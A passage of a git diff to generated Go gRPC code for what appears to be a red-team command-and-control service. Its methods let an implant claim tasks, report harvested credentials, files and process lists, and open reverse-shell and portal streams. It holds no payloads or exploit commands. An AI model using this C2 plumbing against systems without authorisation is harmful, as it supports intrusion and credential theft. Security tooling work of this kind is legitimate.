c2.ReportFileRequest + (*ReportFileResponse)(nil), // 24: c2.ReportFileResponse + (*ReportProcessListRequest)(nil), // 25: c2.ReportProcessListRequest + (*ReportProcessListResponse)(nil), // 26: c2.ReportProcessListResponse + (*ReportTaskOutputMessage)(nil), // 27: c2.ReportTaskOutputMessage + (*ReportShellTaskOutputMessage)(nil), // 28: c2.ReportShellTaskOutputMessage + (*ReportOutputRequest)(nil), // 29: c2.ReportOutputRequest + (*ReportOutputResponse)(nil), // 30: c2.ReportOutputResponse + (*ReverseShellRequest)(nil), // 31: c2.ReverseShellRequest + (*ReverseShellResponse)(nil), // 32: c2.ReverseShellResponse + (*CreatePortalRequest)(nil), // 33: c2.CreatePortalRequest + (*CreatePortalResponse)(nil), // 34: c2.CreatePortalResponse + (*epb.Tome)(nil), // 35: eldritch.Tome + (*timestamppb.Timestamp)(nil), // 36: google.protobuf.Timestamp + (*epb.Credential)(nil), // 37: eldritch.Credential + (*epb.File)(nil), // 38: eldritch.File + (*epb.ProcessList)(nil), // 39: eldritch.ProcessList + (*portalpb.Mote)(nil), // 40: portal.Mote } var file_c2_proto_depIdxs = []int32{ - 1, // 0: c2.Transport.type:type_name -> c2.Transport.Type - 4, // 1: c2.AvailableTransports.transports:type_name -> c2.Transport - 7, // 2: c2.Beacon.host:type_name -> c2.Host - 3, // 3: c2.Beacon.agent:type_name -> c2.Agent - 5, // 4: c2.Beacon.available_transports:type_name -> c2.AvailableTransports - 2, // 5: c2.Host.platform:type_name -> c2.Host.Platform - 30, // 6: c2.Task.tome:type_name -> eldritch.Tome - 10, // 7: c2.TaskOutput.error:type_name -> c2.TaskError - 31, // 8: c2.TaskOutput.exec_started_at:type_name -> google.protobuf.Timestamp - 31, // 9: c2.TaskOutput.exec_finished_at:type_name -> google.protobuf.Timestamp - 10, // 10: c2.ShellTaskOutput.error:type_name -> c2.TaskError - 31, // 11: c2.ShellTaskOutput.exec_started_at:type_name -> google.protobuf.Timestamp - 31, // 12: c2.ShellTaskOutput.exec_finished_at:type_name -> google.protobuf.Timestamp - 6, // 13: c2.ClaimTasksRequest.beacon:type_name -> c2.Beacon - 8, // 14: c2.ClaimTasksResponse.tasks:type_name -> c2.Task - 9, // 15: c2.ClaimTasksResponse.shell_tasks:type_name -> c2.ShellTask - 13, // 16: c2.FetchAssetRequest.context:type_name -> c2.TaskContext - 13, // 17: c2.ReportCredentialRequest.context:type_name -> c2.TaskContext - 32, // 18: c2.ReportCredentialRequest.credential:type_name -> eldritch.Credential - 13, // 19: c2.ReportFileRequest.context:type_name -> c2.TaskContext - 33, // 20: c2.ReportFileRequest.chunk:type_name -> eldritch.File - 13, // 21: c2.ReportProcessListRequest.context:type_name -> c2.TaskContext - 34, // 22: c2.ReportProcessListRequest.list:type_name -> eldritch.ProcessList - 11, // 23: c2.ReportTaskOutputRequest.output:type_name -> c2.TaskOutput - 13, // 24: c2.ReportTaskOutputRequest.context:type_name -> c2.TaskContext - 12, // 25: c2.ReportTaskOutputRequest.shell_task_output:type_name -> c2.ShellTaskOutput - 0, // 26: c2.ReverseShellRequest.kind:type_name -> c2.ReverseShellMessageKind - 13, // 27: c2.ReverseShellRequest.context:type_name -> c2.TaskContext - 0, // 28: c2.ReverseShellResponse.kind:type_name -> c2.ReverseShellMessageKind - 13, // 29: c2.CreatePortalRequest.context:type_name -> c2.TaskContext - 35, // 30: c2.CreatePortalRequest.mote:type_name -> portal.Mote - 35, // 31: c2.CreatePortalResponse.mote:type_name -> portal.Mote - 14, // 32: c2.C2.ClaimTasks:input_type -> c2.ClaimTasksRequest - 16, // 33: c2.C2.FetchAsset:input_type -> c2.FetchAssetRequest - 18, // 34: c2.C2.ReportCredential:input_type -> c2.ReportCredentialRequest - 20, // 35: c2.C2.ReportFile:input_type -> c2.ReportFileRequest - 22, // 36: c2.C2.ReportProcessList:input_type -> c2.ReportProcessListRequest - 24, // 37: c2.C2.ReportTaskOutput:input_type -> c2.ReportTaskOutputRequest - 26, // 38: c2.C2.ReverseShell:input_type -> c2.ReverseShellRequest - 28, // 39: c2.C2.CreatePortal:input_type -> c2.CreatePortalRequest - 15, // 40: c2.C2.ClaimTasks:output_type -> c2.ClaimTasksResponse - 17, // 41: c2.C2.FetchAsset:output_type -> c2.FetchAssetResponse - 19, // 42: c2.C2.ReportCredential:output_type -> c2.ReportCredentialResponse - 21, // 43: c2.C2.ReportFile:output_type -> c2.ReportFileResponse - 23, // 44: c2.C2.ReportProcessList:output_type -> c2.ReportProcessListResponse - 25, // 45: c2.C2.ReportTaskOutput:output_type -> c2.ReportTaskOutputResponse - 27, // 46: c2.C2.ReverseShell:output_type -> c2.ReverseShellResponse - 29, // 47: c2.C2.CreatePortal:output_type -> c2.CreatePortalResponse - 40, // [40:48] is the sub-list for method output_type - 32, // [32:40] is the sub-list for method input_type - 32, // [32:32] is the sub-list for extension type_name - 32, // [32:32] is the sub-list for extension extendee - 0, // [0:32] is the sub-list for field type_name + 2, // 0: c2.Transport.type:type_name -> c2.Transport.Type + 5, // 1: c2.AvailableTransports.transports:type_name -> c2.Transport + 8, // 2: c2.Beacon.host:type_name -> c2.Host + 4, // 3: c2.Beacon.agent:type_name -> c2.Agent + 6, // 4: c2.Beacon.available_transports:type_name -> c2.AvailableTransports + 3, // 5: c2.Host.platform:type_name -> c2.Host.Platform + 35, // 6: c2.Task.tome:type_name -> eldritch.Tome + 11, // 7: c2.TaskOutput.error:type_name -> c2.TaskError + 36, // 8: c2.TaskOutput.exec_started_at:type_name -> google.protobuf.Timestamp + 36, // 9: c2.TaskOutput.exec_finished_at:type_name -> google.protobuf.Timestamp + 11, // 10: c2.ShellTaskOutput.error:type_name -> c2.TaskError + 36, // 11: c2.ShellTaskOutput.exec_started_at:type_name -> google.protobuf.Timestamp + 36, // 12: c2.ShellTaskOutput.exec_finished_at:type_name -> google.protobuf.Timestamp + 7, // 13: c2.ClaimTasksRequest.beacon:type_name -> c2.Beacon + 9, // 14: c2.ClaimTasksResponse.tasks:type_name -> c2.Task + 10, // 15: c2.ClaimTasksResponse.shell_tasks:type_name -> c2.ShellTask + 15, // 16: c2.FetchAssetRequest.task_context:type_name -> c2.TaskContext + 16, // 17: c2.FetchAssetRequest.shell_task_context:type_name -> c2.ShellTaskContext + 15, // 18: c2.ReportCredentialRequest.task_context:type_name -> c2.TaskContext + 16, // 19: c2.ReportCredentialRequest.shell_task_context:type_name -> c2.ShellTaskContext + 37, // 20: c2.ReportCredentialRequest.credential:type_name -> eldritch.Credential + 15, // 21: c2.ReportFileRequest.task_context:type_name -> c2.TaskContext + 16, // 22: c2.ReportFileRequest.shell_task_context:type_name -> c2.ShellTaskContext + 0, // 23: c2.ReportFileRequest.kind:type_name -> c2.ReportFileKind + 38, // 24: c2.ReportFileRequest.chunk:type_name -> eldritch.File + 15, // 25: c2.ReportProcessListRequest.task_context:type_name -> c2.TaskContext + 16, // 26: c2.ReportProcessListRequest.shell_task_context:type_name -> c2.ShellTaskContext + 39, // 27: c2.ReportProcessListRequest.list:type_name -> eldritch.ProcessList + 15, // 28: c2.ReportTaskOutputMessage.context:type_name -> c2.TaskContext + 12, // 29: c2.ReportTaskOutputMessage.output:type_name -> c2.TaskOutput + 16, // 30: c2.ReportShellTaskOutputMessage.context:type_name -> c2.ShellTaskContext + 14, // 31: c2.ReportShellTaskOutputMessage.output:type_name -> c2.ShellTaskOutput + 27, // 32: c2.ReportOutputRequest.task_output:type_name -> c2.ReportTaskOutputMessage + 28, // 33: c2.ReportOutputRequest.shell_task_output:type_name -> c2.ReportShellTaskOutputMessage + 15, // 34: c2.ReverseShellRequest.task_context:type_name -> c2.TaskContext + 16, // 35: c2.ReverseShellRequest.shell_task_context:type_name -> c2.ShellTaskContext + 1, // 36: c2.ReverseShellRequest.kind:type_name -> c2.ReverseShellMessageKind + 1, // 37: c2.ReverseShellResponse.kind:type_name -> c2.ReverseShellMessageKind + 15, // 38: c2.CreatePortalRequest.task_context:type_name -> c2.TaskContext + 16, // 39: c2.CreatePortalRequest.shell_task_context:type_name -> c2.ShellTaskContext + 40, // 40: c2.CreatePortalRequest.mote:type_name -> portal.Mote + 40, // 41: c2.CreatePortalResponse.mote:type_name -> portal.Mote + 17, // 42: c2.C2.ClaimTasks:input_type -> c2.ClaimTasksRequest + 19, // 43: c2.C2.FetchAsset:input_type -> c2.FetchAssetRequest + 21, // 44: c2.C2.ReportCredential:input_type -> c2.ReportCredentialRequest + 23, // 45: c2.C2.ReportFile:input_type -> c2.ReportFileRequest + 25, // 46: c2.C2.ReportProcessList:input_type -> c2.ReportProcessListRequest + 29, // 47: c2.C2.ReportOutput:input_type -> c2.ReportOutputRequest + 31, // 48: c2.C2.ReverseShell:input_type -> c2.ReverseShellRequest + 33, // 49: c2.C2.CreatePortal:input_type -> c2.CreatePortalRequest + 18, // 50: c2.C2.ClaimTasks:output_type -> c2.ClaimTasksResponse + 20, // 51: c2.C2.FetchAsset:output_type -> c2.FetchAssetResponse + 22, // 52: c2.C2.ReportCredential:output_type -> c2.ReportCredentialResponse + 24, // 53: c2.C2.ReportFile:output_type -> c2.ReportFileResponse + 26, // 54: c2.C2.ReportProcessList:output_type -> c2.ReportProcessListResponse + 30, // 55: c2.C2.ReportOutput:output_type -> c2.ReportOutputResponse + 32, // 56: c2.C2.ReverseShell:output_type -> c2.ReverseShellResponse + 34, // 57: c2.C2.CreatePortal:output_type -> c2.CreatePortalResponse + 50, // [50:58] is the sub-list for method output_type + 42, // [42:50] is the sub-list for method input_type + 42, // [42:42] is the sub-list for extension type_name + 42, // [42:42] is the sub-list for extension extendee + 0, // [0:42] is the sub-list for field type_name } func init() { file_c2_proto_init() } @@ -1902,13 +2613,41 @@ func file_c2_proto_init() { if File_c2_proto != nil { return } + file_c2_proto_msgTypes[15].OneofWrappers = []any{ + (*FetchAssetRequest_TaskContext)(nil), + (*FetchAssetRequest_ShellTaskContext)(nil), + } + file_c2_proto_msgTypes[17].OneofWrappers = []any{ + (*ReportCredentialRequest_TaskContext)(nil), + (*ReportCredentialRequest_ShellTaskContext)(nil), + } + file_c2_proto_msgTypes[19].OneofWrappers = []any{ + (*ReportFileRequest_TaskContext)(nil), + (*ReportFileRequest_ShellTaskContext)(nil), + } + file_c2_proto_msgTypes[21].OneofWrappers = []any{ + (*ReportProcessListRequest_TaskContext)(nil), + (*ReportProcessListRequest_ShellTaskContext)(nil), + } + file_c2_proto_msgTypes[25].OneofWrappers = []any{ + (*ReportOutputRequest_TaskOutput)(nil), + (*ReportOutputRequest_ShellTaskOutput)(nil), + } + file_c2_proto_msgTypes[27].OneofWrappers = []any{ + (*ReverseShellRequest_TaskContext)(nil), + (*ReverseShellRequest_ShellTaskContext)(nil), + } + file_c2_proto_msgTypes[29].OneofWrappers = []any{ + (*CreatePortalRequest_TaskContext)(nil), + (*CreatePortalRequest_ShellTaskContext)(nil), + } type x struct{} out := protoimpl.TypeBuilder{ File: protoimpl.DescBuilder{ GoPackagePath: reflect.TypeOf(x{}).PkgPath(), RawDescriptor: unsafe.Slice(unsafe.StringData(file_c2_proto_rawDesc), len(file_c2_proto_rawDesc)), - NumEnums: 3, - NumMessages: 27, + NumEnums: 4, + NumMessages: 31, NumExtensions: 0, NumServices: 1, }, diff --git a/tavern/internal/c2/c2pb/c2_grpc.pb.go b/tavern/internal/c2/c2pb/c2_grpc.pb.go index fda40fc85..23c65e903 100644 --- a/tavern/internal/c2/c2pb/c2_grpc.pb.go +++ b/tavern/internal/c2/c2pb/c2_grpc.pb.go @@ -1,7 +1,7 @@ // Code generated by protoc-gen-go-grpc. DO NOT EDIT. // versions: -// - protoc-gen-go-grpc v1.6.1 -// - protoc v4.25.1 +// - protoc-gen-go-grpc v1.3.0 +// - protoc v3.21.12 // source: c2.proto package c2pb @@ -15,8 +15,8 @@ import ( // This is a compile-time assertion to ensure that this generated file // is compatible with the grpc package it is being compiled against. -// Requires gRPC-Go v1.64.0 or later. -const _ = grpc.SupportPackageIsVersion9 +// Requires gRPC-Go v1.62.0 or later. +const _ = grpc.SupportPackageIsVersion8 const ( C2_ClaimTasks_FullMethodName = "/c2.C2/ClaimTasks" @@ -24,7 +24,7 @@ const ( C2_ReportCredential_FullMethodName = "/c2.C2/ReportCredential" C2_ReportFile_FullMethodName = "/c2.C2/ReportFile" C2_ReportProcessList_FullMethodName = "/c2.C2/ReportProcessList" - C2_ReportTaskOutput_FullMethodName = "/c2.C2/ReportTaskOutput" + C2_ReportOutput_FullMethodName = "/c2.C2/ReportOutput" C2_ReverseShell_FullMethodName = "/c2.C2/ReverseShell" C2_CreatePortal_FullMethodName = "/c2.C2/CreatePortal" ) @@ -42,7 +42,7 @@ type C2Client interface { // - "file-size": The number of bytes contained by the file. // // If no associated file can be found, a NotFound status error is returned. - FetchAsset(ctx context.Context, in *FetchAssetRequest, opts ...grpc.CallOption) (grpc.ServerStreamingClient[FetchAssetResponse], error) + FetchAsset(ctx context.Context, in *FetchAssetRequest, opts ...grpc.CallOption) (C2_FetchAssetClient, error) // Report a credential from the host to the server. ReportCredential(ctx context.Context, in *ReportCredentialRequest, opts ...grpc.CallOption) (*ReportCredentialResponse, error) // Report a file from the host to the server. @@ -52,16 +52,16 @@ type C2Client interface { // // Content is provided as chunks, the size of which are up to the agent to define (based on memory constraints). // Any existing files at the provided path for the host are replaced. - ReportFile(ctx context.Context, opts ...grpc.CallOption) (grpc.ClientStreamingClient[ReportFileRequest, ReportFileResponse], error) + ReportFile(ctx context.Context, opts ...grpc.CallOption) (C2_ReportFileClient, error) // Report the active list of running processes. This list will replace any previously reported // lists for the same host. ReportProcessList(ctx context.Context, in *ReportProcessListRequest, opts ...grpc.CallOption) (*ReportProcessListResponse, error) - // Report execution output for a task. - ReportTaskOutput(ctx context.Context, in *ReportTaskOutputRequest, opts ...grpc.CallOption) (*ReportTaskOutputResponse, error) + // Report execution output. + ReportOutput(ctx context.Context, in *ReportOutputRequest, opts ...grpc.CallOption) (*ReportOutputResponse, error) // Open a reverse shell bi-directional stream. - ReverseShell(ctx context.Context, opts ...grpc.CallOption) (grpc.BidiStreamingClient[ReverseShellRequest, ReverseShellResponse], error) + ReverseShell(ctx context.Context, opts ...grpc.CallOption) (C2_ReverseShellClient, error) // Open a portal bi-directional stream. - CreatePortal(ctx context.Context, opts ...grpc.CallOption) (grpc.BidiStreamingClient[CreatePortalRequest, CreatePortalResponse], error) + CreatePortal(ctx context.Context, opts ...grpc.CallOption) (C2_CreatePortalClient, error) } type c2Client struct { @@ -82,13 +82,13 @@ func (c *c2Client) ClaimTasks(ctx context.Context, in *ClaimTasksRequest, opts . return out, nil } -func (c *c2Client) FetchAsset(ctx context.Context, in *FetchAssetRequest, opts ...grpc.CallOption) (grpc.ServerStreamingClient[FetchAssetResponse], error) { +func (c *c2Client) FetchAsset(ctx context.Context, in *FetchAssetRequest, opts ...grpc.CallOption) (C2_FetchAssetClient, error) { cOpts := append([]grpc.CallOption{grpc.StaticMethod()}, opts...) stream, err := c.cc.NewStream(ctx, &C2_ServiceDesc.Streams[0], C2_FetchAsset_FullMethodName, cOpts...) if err != nil { return nil, err } - x := &grpc.GenericClientStream[FetchAssetRequest, FetchAssetResponse]{ClientStream: stream} + x := &c2FetchAssetClient{ClientStream: stream} if err := x.ClientStream.SendMsg(in); err != nil { return nil, err } @@ -98,8 +98,22 @@ func (c *c2Client) FetchAsset(ctx context.Context, in *FetchAssetRequest, opts . return x, nil } -// This type alias is provided for backwards compatibility with existing code that references the prior non-generic stream type by name. -type C2_FetchAssetClient = grpc.ServerStreamingClient[FetchAssetResponse] +type C2_FetchAssetClient interface { + Recv() (*FetchAssetResponse, error) + grpc.ClientStream +} + +type c2FetchAssetClient struct { + grpc.ClientStream +} + +func (x *c2FetchAssetClient) Recv() (*FetchAssetResponse, error) { + m := new(FetchAssetResponse) + if err := x.ClientStream.RecvMsg(m); err != nil { + return nil, err + } + return m, nil +} func (c *c2Client) ReportCredential(ctx context.Context, in *ReportCredentialRequest, opts ...grpc.CallOption) (*ReportCredentialResponse, error) { cOpts := append([]grpc.CallOption{grpc.StaticMethod()}, opts...) @@ -111,18 +125,40 @@ func (c *c2Client) ReportCredential(ctx context.Context, in *ReportCredentialReq return out, nil } -func (c *c2Client) ReportFile(ctx context.Context, opts ...grpc.CallOption) (grpc.ClientStreamingClient[ReportFileRequest, ReportFileResponse], error) { +func (c *c2Client) ReportFile(ctx context.Context, opts ...grpc.CallOption) (C2_ReportFileClient, error) { cOpts := append([]grpc.CallOption{grpc.StaticMethod()}, opts...) stream, err := c.cc.NewStream(ctx, &C2_ServiceDesc.Streams[1], C2_ReportFile_FullMethodName, cOpts...) if err != nil { return nil, err } - x := &grpc.GenericClientStream[ReportFileRequest, ReportFileResponse]{ClientStream: stream} + x := &c2ReportFileClient{ClientStream: stream} return x, nil } -// This type alias is provided for backwards compatibility with existing code that references the prior non-generic stream type by name. -type C2_ReportFileClient = grpc.ClientStreamingClient[ReportFileRequest, ReportFileResponse] +type C2_ReportFileClient interface { + Send(*ReportFileRequest) error + CloseAndRecv() (*ReportFileResponse, error) + grpc.ClientStream +} + +type c2ReportFileClient struct { + grpc.ClientStream +} + +func (x *c2ReportFileClient) Send(m *ReportFileRequest) error { + return x.ClientStream.SendMsg(m) +} + +func (x *c2ReportFileClient) CloseAndRecv() (*ReportFileResponse, error) { + if err := x.ClientStream.CloseSend(); err != nil { + return nil, err + } + m := new(ReportFileResponse) + if err := x.ClientStream.RecvMsg(m); err != nil { + return nil, err + } + return m, nil +} func (c *c2Client) ReportProcessList(ctx context.Context, in *ReportProcessListRequest, opts ...grpc.CallOption) (*ReportProcessListResponse, error) { cOpts := append([]grpc.CallOption{grpc.StaticMethod()}, opts...) @@ -134,45 +170,83 @@ func (c *c2Client) ReportProcessList(ctx context.Context, in *ReportProcessListR return out, nil } -func (c *c2Client) ReportTaskOutput(ctx context.Context, in *ReportTaskOutputRequest, opts ...grpc.CallOption) (*ReportTaskOutputResponse, error) { +func (c *c2Client) ReportOutput(ctx context.Context, in *ReportOutputRequest, opts ...grpc.CallOption) (*ReportOutputResponse, error) { cOpts := append([]grpc.CallOption{grpc.StaticMethod()}, opts...) - out := new(ReportTaskOutputResponse) - err := c.cc.Invoke(ctx, C2_ReportTaskOutput_FullMethodName, in, out, cOpts...) + out := new(ReportOutputResponse) + err := c.cc.Invoke(ctx, C2_ReportOutput_FullMethodName, in, out, cOpts...) if err != nil { return nil, err } return out, nil } -func (c *c2Client) ReverseShell(ctx context.Context, opts ...grpc.CallOption) (grpc.BidiStreamingClient[ReverseShellRequest, ReverseShellResponse], error) { +func (c *c2Client) ReverseShell(ctx context.Context, opts ...grpc.CallOption) (C2_ReverseShellClient, error) { cOpts := append([]grpc.CallOption{grpc.StaticMethod()}, opts...) stream, err := c.cc.NewStream(ctx, &C2_ServiceDesc.Streams[2], C2_ReverseShell_FullMethodName, cOpts...) if err != nil { return nil, err } - x := &grpc.GenericClientStream[ReverseShellRequest, ReverseShellResponse]{ClientStream: stream} + x := &c2ReverseShellClient{ClientStream: stream} return x, nil } -// This type alias is provided for backwards compatibility with existing code that references the prior non-generic stream type by name. -type C2_ReverseShellClient = grpc.BidiStreamingClient[ReverseShellRequest, ReverseShellResponse] +type C2_ReverseShellClient interface { + Send(*ReverseShellRequest) error + Recv() (*ReverseShellResponse, error) + grpc.ClientStream +} + +type c2ReverseShellClient struct { + grpc.ClientStream +} + +func (x *c2ReverseShellClient) Send(m *ReverseShellRequest) error { + return x.ClientStream.SendMsg(m) +} + +func (x *c2ReverseShellClient) Recv() (*ReverseShellResponse, error) { + m := new(ReverseShellResponse) + if err := x.ClientStream.RecvMsg(m); err != nil { + return nil, err + } + return m, nil +} -func (c *c2Client) CreatePortal(ctx context.Context, opts ...grpc.CallOption) (grpc.BidiStreamingClient[CreatePortalRequest, CreatePortalResponse], error) { +func (c *c2Client) CreatePortal(ctx context.Context, opts ...grpc.CallOption) (C2_CreatePortalClient, error) { cOpts := append([]grpc.CallOption{grpc.StaticMethod()}, opts...) stream, err := c.cc.NewStream(ctx, &C2_ServiceDesc.Streams[3], C2_CreatePortal_FullMethodName, cOpts...) if err != nil { return nil, err } - x := &grpc.GenericClientStream[CreatePortalRequest, CreatePortalResponse]{ClientStream: stream} + x := &c2CreatePortalClient{ClientStream: stream} return x, nil } -// This type alias is provided for backwards compatibility with existing code that references the prior non-generic stream type by name. -type C2_CreatePortalClient = grpc.BidiStreamingClient[CreatePortalRequest, CreatePortalResponse] +type C2_CreatePortalClient interface { + Send(*CreatePortalRequest) error + Recv() (*CreatePortalResponse, error) + grpc.ClientStream +} + +type c2CreatePortalClient struct { + grpc.ClientStream +} + +func (x *c2CreatePortalClient) Send(m *CreatePortalRequest) error { + return x.ClientStream.SendMsg(m) +} + +func (x *c2CreatePortalClient) Recv() (*CreatePortalResponse, error) { + m := new(CreatePortalResponse) + if err := x.ClientStream.RecvMsg(m); err != nil { + return nil, err + } + return m, nil +} // C2Server is the server API for C2 service. // All implementations must embed UnimplementedC2Server -// for forward compatibility. +// for forward compatibility type C2Server interface { // Contact the server for new tasks to execute. ClaimTasks(context.Context, *ClaimTasksRequest) (*ClaimTasksResponse, error) @@ -183,7 +257,7 @@ type C2Server interface { // - "file-size": The number of bytes contained by the file. // // If no associated file can be found, a NotFound status error is returned. - FetchAsset(*FetchAssetRequest, grpc.ServerStreamingServer[FetchAssetResponse]) error + FetchAsset(*FetchAssetRequest, C2_FetchAssetServer) error // Report a credential from the host to the server. ReportCredential(context.Context, *ReportCredentialRequest) (*ReportCredentialResponse, error) // Report a file from the host to the server. @@ -193,52 +267,48 @@ type C2Server interface { // // Content is provided as chunks, the size of which are up to the agent to define (based on memory constraints). // Any existing files at the provided path for the host are replaced. - ReportFile(grpc.ClientStreamingServer[ReportFileRequest, ReportFileResponse]) error + ReportFile(C2_ReportFileServer) error // Report the active list of running processes. This list will replace any previously reported // lists for the same host. ReportProcessList(context.Context, *ReportProcessListRequest) (*ReportProcessListResponse, error) - // Report execution output for a task. - ReportTaskOutput(context.Context, *ReportTaskOutputRequest) (*ReportTaskOutputResponse, error) + // Report execution output. + ReportOutput(context.Context, *ReportOutputRequest) (*ReportOutputResponse, error) // Open a reverse shell bi-directional stream. - ReverseShell(grpc.BidiStreamingServer[ReverseShellRequest, ReverseShellResponse]) error + ReverseShell(C2_ReverseShellServer) error // Open a portal bi-directional stream. - CreatePortal(grpc.BidiStreamingServer[CreatePortalRequest, CreatePortalResponse]) error + CreatePortal(C2_CreatePortalServer) error mustEmbedUnimplementedC2Server() } -// UnimplementedC2Server must be embedded to have -// forward compatible implementations. -// -// NOTE: this should be embedded by value instead of pointer to avoid a nil -// pointer dereference when methods are called. -type UnimplementedC2Server struct{} +// UnimplementedC2Server must be embedded to have forward compatible implementations. +type UnimplementedC2Server struct { +} func (UnimplementedC2Server) ClaimTasks(context.Context, *ClaimTasksRequest) (*ClaimTasksResponse, error) { - return nil, status.Error(codes.Unimplemented, "method ClaimTasks not implemented") + return nil, status.Errorf(codes.Unimplemented, "method ClaimTasks not implemented") } -func (UnimplementedC2Server) FetchAsset(*FetchAssetRequest, grpc.ServerStreamingServer[FetchAssetResponse]) error { - return status.Error(codes.Unimplemented, "method FetchAsset not implemented") +func (UnimplementedC2Server) FetchAsset(*FetchAssetRequest, C2_FetchAssetServer) error { + return status.Errorf(codes.Unimplemented, "method FetchAsset not implemented") } func (UnimplementedC2Server) ReportCredential(context.Context, *ReportCredentialRequest) (*ReportCredentialResponse, error) { - return nil, status.Error(codes.Unimplemented, "method ReportCredential not implemented") + return nil, status.Errorf(codes.Unimplemented, "method ReportCredential not implemented") } -func (UnimplementedC2Server) ReportFile(grpc.ClientStreamingServer[ReportFileRequest, ReportFileResponse]) error { - return status.Error(codes.Unimplemented, "method ReportFile not implemented") +func (UnimplementedC2Server) ReportFile(C2_ReportFileServer) error { + return status.Errorf(codes.Unimplemented, "method ReportFile not implemented") } func (UnimplementedC2Server) ReportProcessList(context.Context, *ReportProcessListRequest) (*ReportProcessListResponse, error) { - return nil, status.Error(codes.Unimplemented, "method ReportProcessList not implemented") + return nil, status.Errorf(codes.Unimplemented, "method ReportProcessList not implemented") } -func (UnimplementedC2Server) ReportTaskOutput(context.Context, *ReportTaskOutputRequest) (*ReportTaskOutputResponse, error) { - return nil, status.Error(codes.Unimplemented, "method ReportTaskOutput not implemented") +func (UnimplementedC2Server) ReportOutput(context.Context, *ReportOutputRequest) (*ReportOutputResponse, error) { + return nil, status.Errorf(codes.Unimplemented, "method ReportOutput not implemented") } -func (UnimplementedC2Server) ReverseShell(grpc.BidiStreamingServer[ReverseShellRequest, ReverseShellResponse]) error { - return status.Error(codes.Unimplemented, "method ReverseShell not implemented") +func (UnimplementedC2Server) ReverseShell(C2_ReverseShellServer) error { + return status.Errorf(codes.Unimplemented, "method ReverseShell not implemented") } -func (UnimplementedC2Server) CreatePortal(grpc.BidiStreamingServer[CreatePortalRequest, CreatePortalResponse]) error { - return status.Error(codes.Unimplemented, "method CreatePortal not implemented") +func (UnimplementedC2Server) CreatePortal(C2_CreatePortalServer) error { + return status.Errorf(codes.Unimplemented, "method CreatePortal not implemented") } func (UnimplementedC2Server) mustEmbedUnimplementedC2Server() {} -func (UnimplementedC2Server) testEmbeddedByValue() {} // UnsafeC2Server may be embedded to opt out of forward compatibility for this service. // Use of this interface is not recommended, as added methods to C2Server will @@ -248,13 +318,6 @@ type UnsafeC2Server interface { } func RegisterC2Server(s grpc.ServiceRegistrar, srv C2Server) { - // If the following call panics, it indicates UnimplementedC2Server was - // embedded by pointer and is nil. This will cause panics if an - // unimplemented method is ever invoked, so we test this at initialization - // time to prevent it from happening at runtime later due to I/O. - if t, ok := srv.(interface{ testEmbeddedByValue() }); ok { - t.testEmbeddedByValue() - } s.RegisterService(&C2_ServiceDesc, srv) } @@ -281,11 +344,21 @@ func _C2_FetchAsset_Handler(srv interface{}, stream grpc.ServerStream) error { if err := stream.RecvMsg(m); err != nil { return err } - return srv.(C2Server).FetchAsset(m, &grpc.GenericServerStream[FetchAssetRequest, FetchAssetResponse]{ServerStream: stream}) + return srv.(C2Server).FetchAsset(m, &c2FetchAssetServer{ServerStream: stream}) } -// This type alias is provided for backwards compatibility with existing code that references the prior non-generic stream type by name. -type C2_FetchAssetServer = grpc.ServerStreamingServer[FetchAssetResponse] +type C2_FetchAssetServer interface { + Send(*FetchAssetResponse) error + grpc.ServerStream +} + +type c2FetchAssetServer struct { + grpc.ServerStream +} + +func (x *c2FetchAssetServer) Send(m *FetchAssetResponse) error { + return x.ServerStream.SendMsg(m) +} func _C2_ReportCredential_Handler(srv interface{}, ctx context.Context, dec func(interface{}) error, interceptor grpc.UnaryServerInterceptor) (interface{}, error) { in := new(ReportCredentialRequest) @@ -306,11 +379,30 @@ func _C2_ReportCredential_Handler(srv interface{}, ctx context.Context, dec func } func _C2_ReportFile_Handler(srv interface{}, stream grpc.ServerStream) error { - return srv.(C2Server).ReportFile(&grpc.GenericServerStream[ReportFileRequest, ReportFileResponse]{ServerStream: stream}) + return srv.(C2Server).ReportFile(&c2ReportFileServer{ServerStream: stream}) } -// This type alias is provided for backwards compatibility with existing code that references the prior non-generic stream type by name. -type C2_ReportFileServer = grpc.ClientStreamingServer[ReportFileRequest, ReportFileResponse] +type C2_ReportFileServer interface { + SendAndClose(*ReportFileResponse) error + Recv() (*ReportFileRequest, error) + grpc.ServerStream +} + +type c2ReportFileServer struct { + grpc.ServerStream +} + +func (x *c2ReportFileServer) SendAndClose(m *ReportFileResponse) error { + return x.ServerStream.SendMsg(m) +} + +func (x *c2ReportFileServer) Recv() (*ReportFileRequest, error) { + m := new(ReportFileRequest) + if err := x.ServerStream.RecvMsg(m); err != nil { + return nil, err + } + return m, nil +} func _C2_ReportProcessList_Handler(srv interface{}, ctx context.Context, dec func(interface{}) error, interceptor grpc.UnaryServerInterceptor) (interface{}, error) { in := new(ReportProcessListRequest) @@ -330,37 +422,75 @@ func _C2_ReportProcessList_Handler(srv interface{}, ctx context.Context, dec fun return interceptor(ctx, in, info, handler) } -func _C2_ReportTaskOutput_Handler(srv interface{}, ctx context.Context, dec func(interface{}) error, interceptor grpc.UnaryServerInterceptor) (interface{}, error) { - in := new(ReportTaskOutputRequest) +func _C2_ReportOutput_Handler(srv interface{}, ctx context.Context, dec func(interface{}) error, interceptor grpc.UnaryServerInterceptor) (interface{}, error) { + in := new(ReportOutputRequest) if err := dec(in); err != nil { return nil, err } if interceptor == nil { - return srv.(C2Server).ReportTaskOutput(ctx, in) + return srv.(C2Server).ReportOutput(ctx, in) } info := &grpc.UnaryServerInfo{ Server: srv, - FullMethod: C2_ReportTaskOutput_FullMethodName, + FullMethod: C2_ReportOutput_FullMethodName, } handler := func(ctx context.Context, req interface{}) (interface{}, error) { - return srv.(C2Server).ReportTaskOutput(ctx, req.(*ReportTaskOutputRequest)) + return srv.(C2Server).ReportOutput(ctx, req.(*ReportOutputRequest)) } return interceptor(ctx, in, info, handler) } func _C2_ReverseShell_Handler(srv interface{}, stream grpc.ServerStream) error { - return srv.(C2Server).ReverseShell(&grpc.GenericServerStream[ReverseShellRequest, ReverseShellResponse]{ServerStream: stream}) + return srv.(C2Server).ReverseShell(&c2ReverseShellServer{ServerStream: stream}) } -// This type alias is provided for backwards compatibility with existing code that references the prior non-generic stream type by name. -type C2_ReverseShellServer = grpc.BidiStreamingServer[ReverseShellRequest, ReverseShellResponse] +type C2_ReverseShellServer interface { + Send(*ReverseShellResponse) error + Recv() (*ReverseShellRequest, error) + grpc.ServerStream +} + +type c2ReverseShellServer struct { + grpc.ServerStream +} + +func (x *c2ReverseShellServer) Send(m *ReverseShellResponse) error { + return 